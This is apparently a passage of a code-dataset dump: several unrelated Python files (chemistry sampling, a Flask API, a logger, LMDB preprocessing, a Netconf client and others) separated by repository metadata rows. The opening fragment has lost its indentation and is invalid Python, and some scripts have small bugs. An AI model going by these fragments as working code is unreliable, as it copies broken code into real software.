def sample_compounds(n1, n2, months, cpd_df):
""" Sample n compounds from each month, initially with overlap allowed
    TODO: fix so that only unique-to-that-month compounds are sampled
    Args:
        n1 (int): first number of compounds to sample per month
        n2 (int): second number of compounds to sample per month
        months (list): list of month strings, e.g. "1980-01"
        cpd_df (pandas dataframe): contains information for each compound in SureChemBL, including InChI
    Returns:
        None: sampled InChIs are saved to pickle files rather than returned
    """
#Inchis for all sampled compounds
sample_inchis_n1 = {}
sample_inchis_n2 = {}
print("----- Sampling Compounds ------\n")
for month in tqdm(months):
cpds = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\CpdPatentIdsDates\\unique_cpds_"
+ month + ".p", "rb"))
sample_cpds_n1 = sample(cpds, n1)
sample_cpds_n2 = sample(cpds, n2)
sub_df = cpd_df[cpd_df["SureChEMBL_ID"].isin(sample_cpds_n1)]
sample_inchis_n1[month] = list(sub_df["InChI"])
sub_df = cpd_df[cpd_df["SureChEMBL_ID"].isin(sample_cpds_n2)]
sample_inchis_n2[month] = list(sub_df["InChI"])
        #Save memory by removing the cpd dataframe and monthly compounds
del (cpd_df)
del (cpds)
#Save sampled inchis to pickle files
print("\n----- Saving Data -----")
pickle.dump(sample_inchis_n1, file=open("Data/sample_inchi_100.p", "wb"))
pickle.dump(sample_inchis_n2, file=open("Data/sample_inchi_1000.p", "wb"))
def main():
# ### Highest Degree compounds ###
data_fp = "G:\\Shared drives\\SureChemBL_Patents\\Cpd_Data\\"
# # build_cpd_df(data_fp) #NOTE: only needs to be run once
cpd_df = pickle.load(file=open(data_fp + "SureChemBL_allCpds.p", "rb"))
print(cpd_df.columns)
# ### Statistics over highest degree compounds ###
# n = 1000 #Number of compounds to find
# for range in [(1980, 1984), (1985, 1989), (1990, 1994), (1995, 1999),
# (2000, 2004), (2005, 2009), (2010, 2014), (2015, 2019)]:
# find_highest_degrees(cpd_df, n, range[0], range[1])
# ### Testing Llanos et al (2019) compounds ###
# find_llanos_cpds(data_fp, cpd_df)
### Sampling compounds for MA analysis ###
month_unique_cpds = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\CpdPatentIdsDates\\unique_cpds_AllMonths.p",
"rb"))
sample_compounds_unique(1000, build_month_increments(1980, 2019),
month_unique_cpds, cpd_df)
# sample_compounds(100, 1000, build_month_increments(1980, 2019), cpd_df)
### MA Analysis ###
if __name__ == "__main__":
main()
| 36.148649
| 113
| 0.622056
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,828
| 0.544673
|
b0d801bb287e5fc7e3b701b27f659bf6cdfd48e3
| 303
|
py
|
Python
|
src/tests/pyfrc_test.py
|
SpookyWoogin/robot2018
|
a8ddf6a64b883904b15031e0ae13b2056faed4f5
|
[
"MIT"
] | 1
|
2018-10-24T21:43:00.000Z
|
2018-10-24T21:43:00.000Z
|
src/tests/pyfrc_test.py
|
SpookyWoogin/robot2018
|
a8ddf6a64b883904b15031e0ae13b2056faed4f5
|
[
"MIT"
] | 1
|
2018-03-10T01:25:47.000Z
|
2018-03-10T03:33:36.000Z
|
src/tests/pyfrc_test.py
|
SpookyWoogin/robot2018
|
a8ddf6a64b883904b15031e0ae13b2056faed4f5
|
[
"MIT"
] | 6
|
2018-01-13T17:54:31.000Z
|
2018-02-13T23:46:50.000Z
|
def test_drivetrain_nt(Notifier):
import networktables
from robot import Rockslide
robot = Rockslide()
robot.robotInit()
drivetrain = robot.drivetrain
drivetrain.periodic()
assert networktables.NetworkTables.getTable("/Drivetrain/Left").getNumber("Position", None) == 0.0
| 25.25
| 102
| 0.726073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 28
| 0.092409
|
b0d95d877dbc18f3a49976b9ba5deae89d43a171
| 350
|
py
|
Python
|
finished/python_principles/05_type_check.py
|
UltiRequiem/daily-python-practice
|
31f72c45378be90b8fcadd30d7042819ee551a17
|
[
"MIT"
] | 8
|
2021-05-29T23:30:12.000Z
|
2021-09-24T03:25:44.000Z
|
finished/python_principles/05_type_check.py
|
UltiRequiem/daily-python-practice
|
31f72c45378be90b8fcadd30d7042819ee551a17
|
[
"MIT"
] | null | null | null |
finished/python_principles/05_type_check.py
|
UltiRequiem/daily-python-practice
|
31f72c45378be90b8fcadd30d7042819ee551a17
|
[
"MIT"
] | 6
|
2021-06-02T14:20:24.000Z
|
2021-08-19T00:49:26.000Z
|
"""
Your function should return True if both parameters are integers, and False otherwise.
"""
def only_ints(a, b) -> bool:
return type(a) == int and type(b) == int
def tests() -> None:
print(only_ints(4, 8))
print(only_ints(4, "u"))
print(only_ints("a", 4))
print(only_ints(4, True))
if __name__ == "__main__":
tests()
| 18.421053
| 86
| 0.62
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 110
| 0.314286
|
b0da89a6bb254fa22755c06a1a618c46fe33ed81
| 3,775
|
py
|
Python
|
media/limited_series.py
|
FellowHashbrown/MediaQueue
|
0844649709698c66b7ed14e70436b3830ab18627
|
[
"MIT"
] | null | null | null |
media/limited_series.py
|
FellowHashbrown/MediaQueue
|
0844649709698c66b7ed14e70436b3830ab18627
|
[
"MIT"
] | null | null | null |
media/limited_series.py
|
FellowHashbrown/MediaQueue
|
0844649709698c66b7ed14e70436b3830ab18627
|
[
"MIT"
] | null | null | null |
import os
from json import dump
from typing import List
from media import Episode, Show
from options import options
class LimitedSeries(Show):
"""A LimitedSeries is a Show that has only 1 Season of Episodes.
In this, only the Episodes need to be specified
:param name: The name of this LimitedSeries
:param episodes: A list of Episodes in this LimitedSeries
:param provider: The name of the streaming provider this LimitedSeries is located on
:param person: The person that is watching this LimitedSeries
:keyword started: Whether or not this LimitedSeries has been started (Defaults to False)
:keyword finished: Whether or not this LimitedSeries has been finished (Defaults to False)
:keyword json: The JSON object to load a LimitedSeries object from
:keyword filename: The JSON file to load a LimitedSeries object from
:raises FileNotFoundError: When the JSON file cannot be found
:raises KeyError: When the required parameters are missing from the JSON object
"""
FOLDER = "limitedSeries"
def __init__(self, name: str = None, provider: str = None,
person: str = None, episodes: List[Episode] = None,
*, started: bool = False, finished: bool = False,
json: dict = None, filename: str = None):
super().__init__(name, provider, person,
episodes=episodes,
started=started, finished=finished,
json=json, filename=filename)
def __str__(self):
return "LimitedSeries({}, {}, {}, {}, {}, {}, {})".format(
self.get_id(), self.get_name(),
self.get_provider(), self.get_person(),
"Started" if self.is_started() else "Not Started",
"Finished" if self.is_finished() else "Not Finished",
", ".join([str(episode) for episode in self.get_episodes()])
)
def __eq__(self, limited_series: 'LimitedSeries'):
if not isinstance(limited_series, LimitedSeries):
return False
return (limited_series.get_name() == self.get_name() and
                limited_series.get_episodes() == self.get_episodes() and
limited_series.get_provider() == self.get_provider() and
limited_series.get_person() == self.get_person() and
limited_series.is_started() is self.is_started() and
limited_series.is_finished() is self.is_finished())
# # # # # # # # # # # # # # # # # # # # # # # # #
def to_csv(self) -> str:
"""Returns the CSV representation of this LimitedSeries object"""
show_csv = "\"{}\",{},{},{},{}".format(
self.get_name(), self.get_provider(),
self.get_person(),
self.is_started(), self.is_finished()
)
episodes_csv = "\n".join(episode.to_csv() for episode in self.get_episodes())
return f"LimitedSeries\n{show_csv}\n{episodes_csv}"
def to_json(self) -> dict:
"""Returns the JSON representation of this LimitedSeries object"""
super_json = super().to_json()
super_json.pop("seasons") # A limited series shouldn't have Seasons
return super_json
def save(self):
"""Saves this LimitedSeries object into a JSON file"""
if not os.path.exists(f"{options.get_base_dir()}/data"):
os.mkdir(f"{options.get_base_dir()}/data")
if not os.path.exists(f"{options.get_base_dir()}/data/{LimitedSeries.FOLDER}"):
os.mkdir(f"{options.get_base_dir()}/data/{LimitedSeries.FOLDER}")
with open("{}/data/{}/{}.json".format(options.get_base_dir(), LimitedSeries.FOLDER, self.get_id()), "w") as jsonfile:
dump(self.to_json(), jsonfile, indent=4)
| 45.481928
| 125
| 0.625166
| 3,655
| 0.968212
| 0
| 0
| 0
| 0
| 0
| 0
| 1,546
| 0.409536
|
b0daa63a5af9ec548e408e77f43dd85ab4843906
| 462
|
py
|
Python
|
__findModuleLocations.py
|
simdevex/01.Basics
|
cf4f372384e66f4b26e4887d2f5d815a1f8e929c
|
[
"MIT"
] | null | null | null |
__findModuleLocations.py
|
simdevex/01.Basics
|
cf4f372384e66f4b26e4887d2f5d815a1f8e929c
|
[
"MIT"
] | null | null | null |
__findModuleLocations.py
|
simdevex/01.Basics
|
cf4f372384e66f4b26e4887d2f5d815a1f8e929c
|
[
"MIT"
] | null | null | null |
'''
Python program to find the location of Python module sources
'''
#Location of Python module sources:
import imp
print("Location of Python os module sources:")
print(imp.find_module('os'))
print("\nLocation of Python datetime module sources:")
print(imp.find_module('datetime'))
#List of directories of specific module:
import os
print("\nos.path module:")
print(os.path)
print("\nList of directories in sys module:")
import sys
print(sys.path)
| 24.315789
| 59
| 0.75974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 312
| 0.675325
|
b0dc67e2fb068fd1e2da407f360e7696247d97ff
| 8,104
|
py
|
Python
|
api.py
|
gitroulette/gitroulette
|
0c53cdf843b202efa7d0e7a3fcbcb0a7bc7f0b0b
|
[
"Apache-2.0"
] | null | null | null |
api.py
|
gitroulette/gitroulette
|
0c53cdf843b202efa7d0e7a3fcbcb0a7bc7f0b0b
|
[
"Apache-2.0"
] | null | null | null |
api.py
|
gitroulette/gitroulette
|
0c53cdf843b202efa7d0e7a3fcbcb0a7bc7f0b0b
|
[
"Apache-2.0"
] | null | null | null |
import json
import random
from flask import Blueprint
from flask import request
from flask import session
from sqlalchemy import and_
from sqlalchemy import or_
from urlparse import urlparse
# from flask import current_app
from gitRoulette import auth
from gitRoulette import models
from gitRoulette.utils import request_utils
api = Blueprint('api', __name__)
db = models.db
@api.route('/new_for_review', methods=['POST'])
@auth.login_required
def new_for_review():
if request.method == 'POST':
req_data = json.loads(request.data)
language_list = request_utils.get_url_languages(
req_data['url'], session['github_token'][0]).keys()
# FIXME: change name to description in post request
# FIXME: change time to be taken on the server
entry = models.Url(name=req_data['name'],
url=req_data['url'],
github_user=req_data['github_user'])
for l in language_list:
language = models.Language(language=l, url=entry)
db.session.add(language)
db.session.add(entry)
db.session.commit()
return str(entry.id)
@api.route('/remove_from_list', methods=['POST'])
@auth.login_required
def remove_from_queue():
req_data = json.loads(request.data)
url = models.Url.query.filter(
and_(models.Url.github_user == session['github_user'],
models.Url.name == req_data['name'])).first()
languages = url.languages.all()
for language in languages:
db.session.delete(language)
db.session.delete(url)
db.session.commit()
return "test"
@api.route('/new_something', methods=['POST'])
@auth.login_required
def new_something():
if request.method == 'POST':
req_data = json.loads(request.data)
github_user = models.GitUser.query.filter_by(
github_user=req_data['github_user']).first()
if github_user is None:
return "no user"
# checks if user is trying to add to himself
elif req_data['github_user'] == session['github_user']:
return "cannot add to yourself"
else:
something = github_user.somethings.filter_by(
comment_id=req_data['comment_id']).first()
if something is None:
something = models.Something(comment_id=req_data['comment_id'],
gituser=github_user)
db.session.add(something)
db.session.commit()
return "test"
@api.route('/somethings_by_url_id/<url_id>', methods=['GET'])
@auth.login_required
def somethings_by_url_id(url_id):
# TODO: maybe we need this for something
url = models.Url.query.filter_by(id=url_id).first()
somethings = [s.comment_id for s in url.somethings.all()]
return json.dumps({"somethings": somethings})
@api.route('/somethings_by_username/<username>', methods=['GET'])
@auth.login_required
def somethings_by_username(username):
github_user = models.GitUser.query.filter_by(github_user=username).first()
somethings = [s.comment_id for s in github_user.somethings.all()]
print(somethings)
return json.dumps({"somethings": somethings})
@api.route('/languages_by_url_id/<url_id>', methods=['GET'])
@auth.login_required
def languages_by_url_id(url_id):
url = models.Url.query.filter_by(id=url_id).first()
languages = url.languages.all()
language_list = [l.language for l in languages]
ret_val = {"languages": language_list}
return json.dumps(ret_val)
@api.route('/new_github_user', methods=['POST'])
@auth.login_required
def new_github_user():
# TODO: modify so that a user can add/remove/replace skills;
# TODO: case: no skills on github..
# TODO: add a dropdown with common skills.
if request.method == 'POST':
req_data = json.loads(request.data)
gituser = models.GitUser.query.filter_by(
github_user=session['github_user']).first()
if gituser is None:
gituser = models.GitUser(github_user=session['github_user'])
db.session.add(gituser)
for skill in req_data['skills']:
_s = models.Skill(skill=skill, gituser=gituser)
db.session.add(_s)
db.session.commit()
return "success"
@api.route('/comments_by_url_id/<url_id>')
@auth.login_required
def comments_by_url_id(url_id):
# FIXME: at the moment we only take pulls comments, no issues.
# issues will show comments in "conversation" too.
# Should we do another request if entry_type is pull?
url = models.Url.query.filter_by(id=url_id).first()
pathArray = urlparse(url.url).path.split('/')
github_user = pathArray[1]
project = pathArray[2]
entry_type = pathArray[3]
entry_id = pathArray[4]
endpoint = 'repos/' + github_user + "/" + project + "/"
endpoint += entry_type + "s/" + entry_id + "/comments"
comments = auth.github.get(endpoint)
# the response has nothing to do with the url_id restructure.
# needs work. we need a better standard
def lmbd(comment): comment.update({'url_name': url.name, 'url_id': url.id})
return json.dumps(
{project: [lmbd(comment) or comment for comment in comments.data]})
@api.route('/decline_comment', methods=['POST'])
@auth.login_required
def decline_comment():
req_data = json.loads(request.data)
url = models.Url.query.filter_by(id=req_data["url_id"]).first()
pathArray = urlparse(url.url).path.split('/')
github_user = pathArray[1]
project = pathArray[2]
entry_type = pathArray[3]
entry_id = pathArray[4]
endpoint = 'repos/' + github_user + "/" + project + "/"
endpoint += entry_type + "s/" + entry_id + "/comments"
post_data = {'body': 'No thanks!',
'in_reply_to': int(req_data["comment_id"])}
headers = {'Accept': 'application/json',
'Content-Type': 'application/json; charset=utf-8'}
resp = auth.github.post(endpoint, data=post_data, headers=headers,
format='json')
return json.dumps({"response": resp.data})
@api.route('/skills_by_username/<github_user>', methods=['GET'])
@auth.login_required
def skills_by_username(github_user):
endpoint = "/users/" + github_user + "/repos"
repos = auth.github.get(endpoint).data
languages = [language for repo in repos for language in
request_utils.get_url_languages(
repo["html_url"], session['github_token'][0]).keys()]
print(languages)
return json.dumps(list(set(languages)))
@api.route('/saved_skills_by_username/<github_user>', methods=['GET'])
@auth.login_required
def saved_skills_by_username(github_user):
user = models.GitUser.query.filter_by(github_user=github_user).first()
skills = user.skills.all()
skills_list = [s.skill for s in skills]
return json.dumps(list(set(skills_list)))
@api.route('/urls_by_username/<github_user>', methods=['GET'])
@auth.login_required
def saved_urls_by_username(github_user):
urls = models.Url.query.filter_by(github_user=github_user).all()
existing_urls = []
for url in urls:
entry = {'id': url.id,
'name': url.name,
'url': url.url,
'github_user': url.github_user}
existing_urls.append(entry)
return json.dumps(existing_urls)
@api.route('/url_to_review', methods=['GET'])
@auth.login_required
def url_to_review():
user = models.GitUser.query.filter_by(github_user=session['github_user']).first()
skills = user.skills.all()
# We need to have atleast one condition otherwise the query will return all.
if len(skills) == 0:
return ''
conditions = [getattr(models.Language, 'language').ilike('%{}%'.format(s.skill)) for s in skills]
q = models.Language.query.filter(or_(*conditions)).distinct(models.Language.url_id)
language_entries = q.all()
random_url_id = random.choice(language_entries).url_id
url = models.Url.query.filter_by(id=random_url_id).first()
return str(url.url)
| 32.15873
| 101
| 0.659057
| 0
| 0
| 0
| 0
| 7,686
| 0.948421
| 0
| 0
| 1,690
| 0.208539
|
b0ddf344239a48edf5e77538da1c1fa89461c624
| 1,556
|
py
|
Python
|
translator/logger.py
|
dNationCloud/jsonnet-translator
|
94d9d1b56d21a357fcab8adc555aa4630234d19c
|
[
"Apache-2.0"
] | 7
|
2021-04-14T11:30:03.000Z
|
2021-05-17T11:26:50.000Z
|
translator/logger.py
|
dNationCloud/jsonnet-translator
|
94d9d1b56d21a357fcab8adc555aa4630234d19c
|
[
"Apache-2.0"
] | 10
|
2021-01-14T07:18:55.000Z
|
2021-10-01T12:56:39.000Z
|
translator/logger.py
|
dNationCloud/kubernetes-jsonnet-translator
|
94d9d1b56d21a357fcab8adc555aa4630234d19c
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2020 The dNation Jsonnet Translator Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import logging.handlers
import sys
from pythonjsonlogger import jsonlogger
LOGGER_NAME = "translator"
LOG_FORMAT = "%(asctime)s - [%(levelname)-5s] - %(message)s"
FORMATTER = {
"default": logging.Formatter(LOG_FORMAT),
"json": jsonlogger.JsonFormatter(LOG_FORMAT),
}
def get_logger():
return logging.getLogger(LOGGER_NAME)
def get_console_handler(formatter):
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(formatter)
return console_handler
def set_logger(level, format):
"""Sets the threshold for the logger to defined level and format
Args:
level (str): Logger threshold.
format (str): Logger format.
Return:
None
"""
formatter = FORMATTER[format]
logger = logging.getLogger(LOGGER_NAME)
logger.setLevel(level)
logger.addHandler(get_console_handler(formatter))
logger.propagate = False
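# Minimal usage sketch (illustrative, not part of the original module; the level string and
# log message below are arbitrary example values):
#
#     set_logger("INFO", "json")
#     get_logger().info("translator started")
#
# The format argument must be one of the FORMATTER keys defined above ("default" or "json").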
| 27.785714
| 77
| 0.737147
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 869
| 0.558483
|
b0de787d9d796dd2d84865af0e45d3952304b306
| 5,663
|
py
|
Python
|
models/test2/scripts/lmdb_data.py
|
Mehuli-Ruh11/Flownet_v1
|
17d517416a24f396a21e36e35e73abeb857451d2
|
[
"BSD-2-Clause"
] | 130
|
2016-10-28T18:37:14.000Z
|
2022-03-29T03:24:31.000Z
|
models/test2/scripts/lmdb_data.py
|
Mehuli-Ruh11/Flownet_v1
|
17d517416a24f396a21e36e35e73abeb857451d2
|
[
"BSD-2-Clause"
] | 34
|
2016-09-30T14:35:11.000Z
|
2019-01-06T12:02:17.000Z
|
models/test2/scripts/lmdb_data.py
|
Mehuli-Ruh11/Flownet_v1
|
17d517416a24f396a21e36e35e73abeb857451d2
|
[
"BSD-2-Clause"
] | 73
|
2016-06-24T10:51:51.000Z
|
2020-12-22T11:21:40.000Z
|
import numpy as np
import caffe
import flowlib as fl
import os
import lmdb
from PIL import Image
VERBOSE = 0
SUBPIXELFACTOR = 4
MIN_FLOW = -4.18505
THRESHOLD = 1e8
PATCH_SIZE = 'FULL'
def data2lmdb():
# define image and ground truth file
train_imagefile1 = 'data/Urban3/frame10.png' # specify 1st image file
train_imagefile2 = 'data/Urban3/frame11.png' # specify 2nd image file
train_labelfile = 'gt/Urban3/flow10.flo' # specify label file
test_imagefile1 = 'data/Grove2/frame10.png' # specify 1st image file
    test_imagefile2 = 'data/Grove2/frame11.png' # specify 2nd image file
test_labelfile = 'gt/Grove2/flow10.flo' # specify test label file
# preprocessing
train_images = preprocess_image(train_imagefile1, train_imagefile2)
train_labels, max_label= preprocess_label(train_labelfile)
    print("Maximum number of classes in training set is: ", max_label + 1)
# Testing data
test_images = preprocess_image(test_imagefile1, test_imagefile2)
test_labels, test_max_label = preprocess_label(test_labelfile)
    print("Maximum number of classes in testing set is: ", test_max_label + 1)
## TRAINING
# read image
db = lmdb.open('train-image-lmdb-full', map_size=int(1e12))
with db.begin(write=True) as txn:
for i in range(len(train_images)):
image_data = caffe.io.array_to_datum(train_images[i])
txn.put('{:08}'.format(i), image_data.SerializeToString())
db.close()
# read label
db = lmdb.open('train-label-lmdb-full', map_size=int(1e12))
with db.begin(write=True) as txn:
for i in range(len(train_labels)):
label_data = caffe.io.array_to_datum(train_labels[i])
txn.put('{:08}'.format(i), label_data.SerializeToString())
db.close()
## TESTING
# read image
db = lmdb.open('test-image-lmdb-full', map_size=int(1e12))
with db.begin(write=True) as txn:
for i in range(len(test_images)):
image_data = caffe.io.array_to_datum(test_images[i])
txn.put('{:08}'.format(i), image_data.SerializeToString())
db.close()
# read label
db = lmdb.open('test-label-lmdb-full', map_size=int(1e12))
with db.begin(write=True) as txn:
for i in range(len(test_labels)):
label_data = caffe.io.array_to_datum(test_labels[i])
txn.put('{:08}'.format(i), label_data.SerializeToString())
db.close()
def preprocess_data(path, mode):
if mode == 'label':
folders = os.listdir(path)
folders.sort()
for folder in folders:
labelfile = os.path.join('gt', folder, 'flow10.flo')
            labels, max_label = preprocess_label(labelfile)
def preprocess_image(imagefile1, imagefile2):
# read image file
img1 = Image.open(imagefile1)
img2 = Image.open(imagefile2)
# Convert image file to array
im1 = np.array(img1)
im2 = np.array(img2)
# RGB to BGR for caffe
im1 = im1[:, :, ::-1]
im2 = im2[:, :, ::-1]
# Concatenate
img = np.concatenate((im1, im2), axis=2)
# Convert to caffe blob
img = img.transpose((2,0,1))
# Segment image into smaller patches
images = []
    # check if the patch size is compatible with the input image dimensions
height, width = img.shape[1], img.shape[2]
if PATCH_SIZE == 'FULL':
images.append(img)
else:
if height%PATCH_SIZE != 0 or width%PATCH_SIZE != 0:
            raise ValueError("PATCH_SIZE must evenly divide the image height and width")
        else:
            for i in range(0, height//PATCH_SIZE):
                for j in range(0, width//PATCH_SIZE):
im = img[:, PATCH_SIZE*i:PATCH_SIZE*(i+1), PATCH_SIZE*j:PATCH_SIZE*(j+1)]
images.append(im)
return images
def preprocess_label(labelfile):
# init
max_label = -1
labels = []
# read flow file
flow = fl.read_flow(labelfile)
height, width = flow.shape[0], flow.shape[1]
# TODO: processing vector u, horizontal flow only
# label patch : 32 x 32
# ground truth map size : 388 x 584 (12 x 18 patches)
# seperate GT map into patches
if PATCH_SIZE == 'FULL':
label, max_label = flow2label(flow[:, :, 0], SUBPIXELFACTOR)
labels.append(label)
else:
if height%PATCH_SIZE != 0 or width%PATCH_SIZE != 0:
            raise ValueError("PATCH_SIZE must evenly divide the flow field height and width")
        else:
            for i in range(0, height//PATCH_SIZE):
                for j in range(0, width//PATCH_SIZE):
patch = flow[PATCH_SIZE*i:PATCH_SIZE*(i+1),PATCH_SIZE*j:PATCH_SIZE*(j+1),0]
u = np.array(patch)
# find largest displacement
label, largest_label = flow2label(u, SUBPIXELFACTOR)
labels.append(label)
if largest_label > max_label:
max_label = largest_label
return labels, max_label
def flow2label(flow, subpixel_factor):
# security check
if len(flow.shape) > 2:
        raise ValueError("flow must be a 2-D array")
# unknown flow, occlusion
idx = (abs(flow) > THRESHOLD)
flow[idx] = 0
# Convert flow to one direction
flow_nonnegtive = flow + abs(MIN_FLOW)
flow_nonnegtive[idx] = 0
# discretize flow at subpixel level
label = np.floor(flow_nonnegtive * subpixel_factor)
label = label.astype(np.uint8)
# get the largest label
max_label = max(-999, np.max(label))
print("maximum label is: ", max_label)
# convert to caffe format
label = np.expand_dims(label, axis=0)
return label, max_label
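# Worked example of the discretization above (added for exposition): with MIN_FLOW = -4.18505
# and SUBPIXELFACTOR = 4, a horizontal flow value u = 0.0 becomes 0.0 + 4.18505 = 4.18505 and
# is binned to floor(4.18505 * 4) = 16, so label 16 corresponds to roughly zero displacement.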
def find_max_min_flow(flow):
# security check
if len(flow.shape) > 2:
        raise ValueError("flow must be a 2-D array")
# unknown flow, occlusion
idx = (abs(flow) > THRESHOLD)
flow[idx] = 0
max_flow = max(-999, np.max(flow))
min_flow = min(999, np.min(flow))
if VERBOSE:
        print('max_flow: ', max_flow)
        print('min_flow: ', min_flow)
return max_flow, min_flow
def read_lmdb(database_file):
"""
Read lmdb data
return content and shape
"""
db = lmdb.open(database_file, readonly=True)
with db.begin() as txn:
raw_data = txn.get(b'00000000') # get the first key value
datum = caffe.proto.caffe_pb2.Datum()
datum.ParseFromString(raw_data)
# convert string type data to actual data
# content now is a Nx1 array
content = np.fromstring(datum.data, dtype=np.uint8)
shape = [datum.channels, datum.height, datum.width]
return content, shape
| 27.357488
| 80
| 0.707046
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,464
| 0.25852
|
b0df7d5ad0499addaf0ae1570bc27728fffba61b
| 778
|
py
|
Python
|
configs/_base_/det_datasets/pool_icdar2013_icdar2015.py
|
andrgje/mmocr
|
26963dcf56b6cc842d097617a9dc1688b01fcaed
|
[
"Apache-2.0"
] | null | null | null |
configs/_base_/det_datasets/pool_icdar2013_icdar2015.py
|
andrgje/mmocr
|
26963dcf56b6cc842d097617a9dc1688b01fcaed
|
[
"Apache-2.0"
] | null | null | null |
configs/_base_/det_datasets/pool_icdar2013_icdar2015.py
|
andrgje/mmocr
|
26963dcf56b6cc842d097617a9dc1688b01fcaed
|
[
"Apache-2.0"
] | null | null | null |
dataset_type1 = 'IcdarDataset'
data_root1 = 'data/icdar15'
train1 = dict(
type=dataset_type1,
ann_file=f'{data_root1}/instances_training.json',
img_prefix=f'{data_root1}/imgs',
pipeline=None)
test1 = dict(
type=dataset_type1,
ann_file=f'{data_root1}/instances_validation.json',
img_prefix=f'{data_root1}/imgs',
pipeline=None)
dataset_type2 = 'IcdarDataset'
data_root2 = 'data/icdar13'
train2 = dict(
type=dataset_type2,
ann_file=f'{data_root2}/instances_training.json',
img_prefix=f'{data_root2}/imgs',
pipeline=None)
test2 = dict(
type=dataset_type2,
ann_file=f'{data_root2}/instances_validation.json',
img_prefix=f'{data_root2}/imgs',
pipeline=None)
train_list = [train1,train2]
test_list = [test1,test2]
| 22.882353
| 55
| 0.713368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 296
| 0.380463
|
b0e1dfb1774454a45bec65b7f4f0e603d7f1da9e
| 13,580
|
py
|
Python
|
lib/Protocol/EmNetconfProtocol.py
|
multi-service-fabric/element-manager
|
e550d1b5ec9419f1fb3eb6e058ce46b57c92ee2f
|
[
"Apache-2.0"
] | null | null | null |
lib/Protocol/EmNetconfProtocol.py
|
multi-service-fabric/element-manager
|
e550d1b5ec9419f1fb3eb6e058ce46b57c92ee2f
|
[
"Apache-2.0"
] | null | null | null |
lib/Protocol/EmNetconfProtocol.py
|
multi-service-fabric/element-manager
|
e550d1b5ec9419f1fb3eb6e058ce46b57c92ee2f
|
[
"Apache-2.0"
] | 1
|
2020-04-02T01:17:43.000Z
|
2020-04-02T01:17:43.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright(c) 2019 Nippon Telegraph and Telephone Corporation
# Filename: EmNetconfProtocol.py
'''
Protocol processing section (Netconf)
'''
import traceback
import time
import json
from ncclient import manager
from ncclient import operations
import GlobalModule
import EmNetconfClient
from EmCommonLog import decorater_log
from EmCommonLog import decorater_log_in_out
class EmNetconfProtocol(object):
'''
Protocol processing section (Netconf) class
'''
__CONNECT_OK = 1
__CONNECT_CAPABILITY_NG = 2
__CONNECT_NO_RESPONSE = 3
@decorater_log_in_out
def connect_device(self, device_info):
'''
Device connection control
        Establish an SSH connection to the target device based on the request information.
Explanation about parameter:
device_info: Device information
Platform name
OS
Firm version
Login ID
Password
IPv4 address for management
Prefix of IPv4 address for management
Device information to be used for ncclient.
(to be set only when necessary)
Port No. to be used for ncclient.
(to be set only when necessary)
Explanation about return value:
Connection result :
int (1:Normal, 2: Capability Abnormal 3:No response)
'''
parse_json = json.loads(device_info)
device_info_dict = parse_json["device_info"]
self.__device_ip = device_info_dict["mgmt_if_address"]
username = device_info_dict["username"]
password = device_info_dict["password"]
device_info = device_info_dict.get("device_info")
port_number = device_info_dict.get("port_number")
if device_info is not None:
device_params = {'name': str(device_info)}
else:
device_params = None
GlobalModule.EM_LOGGER.debug("device_params = %s", device_params)
if port_number is None:
port_number = 830
GlobalModule.EM_LOGGER.debug("port_number = %s", port_number)
result, timer_protocol = GlobalModule.EM_CONFIG.\
read_sys_common_conf("Timer_netconf_protocol")
if result is not True:
timeout_val = 60
GlobalModule.EM_LOGGER.debug(
"Netconf Protocol Timer default Setting: %s", timeout_val)
else:
timeout_val = timer_protocol / 1000
GlobalModule.EM_LOGGER.debug(
"Netconf Protocol Timer: %s", timeout_val)
result, timer_connection = GlobalModule.EM_CONFIG.\
read_sys_common_conf("Timer_connection_retry")
if result is not True:
retrytimer_val = 5
GlobalModule.EM_LOGGER.debug(
"Connection Retry Timer default Setting: %s", retrytimer_val)
else:
retrytimer_val = timer_connection / 1000.0
GlobalModule.EM_LOGGER.debug(
"Connection Retry Timer: %s", retrytimer_val)
result, retry_num = GlobalModule.EM_CONFIG.\
read_sys_common_conf("Connection_retry_num")
if result is not True:
retry_num_val = 5
GlobalModule.EM_LOGGER.debug(
"Connection Retry Num default Setting: %s", retry_num_val)
else:
retry_num_val = retry_num
GlobalModule.EM_LOGGER.debug(
"Connection Retry Num: %s", retry_num_val)
for count in range(retry_num_val):
try:
self.__connection = EmNetconfClient.connect_ssh(
host=self.__device_ip,
port=port_number,
username=username,
password=password,
timeout=timeout_val,
hostkey_verify=False,
device_params=device_params,
device_info=device_info_dict)
break
except Exception as exception:
GlobalModule.EM_LOGGER.debug(
"Connect Error:%s", str(type(exception)))
GlobalModule.EM_LOGGER.debug(
"Connect Error args: %s", str(exception.args))
GlobalModule.EM_LOGGER.debug(traceback.format_exc())
GlobalModule.EM_LOGGER.debug(
"Connection Wait Counter: %s", count)
time.sleep(retrytimer_val)
if count < (retry_num_val - 1):
continue
return self.__CONNECT_NO_RESPONSE
device_capability_list = self.__connection.server_capabilities
GlobalModule.EM_LOGGER.debug(
"device_capability_list: %s", device_capability_list)
capability_judge = False
for cap in self.__capability_list:
for device_cap in device_capability_list:
if cap == device_cap:
capability_judge = True
if capability_judge is not True:
GlobalModule.EM_LOGGER.debug(
"Connect Error:exceptions.MissingCapabilityError")
return self.__CONNECT_CAPABILITY_NG
self.__connection.raise_mode = operations.RaiseMode.NONE
GlobalModule.EM_LOGGER.info("107001 SSH Connection Open for %s",
self.__device_ip)
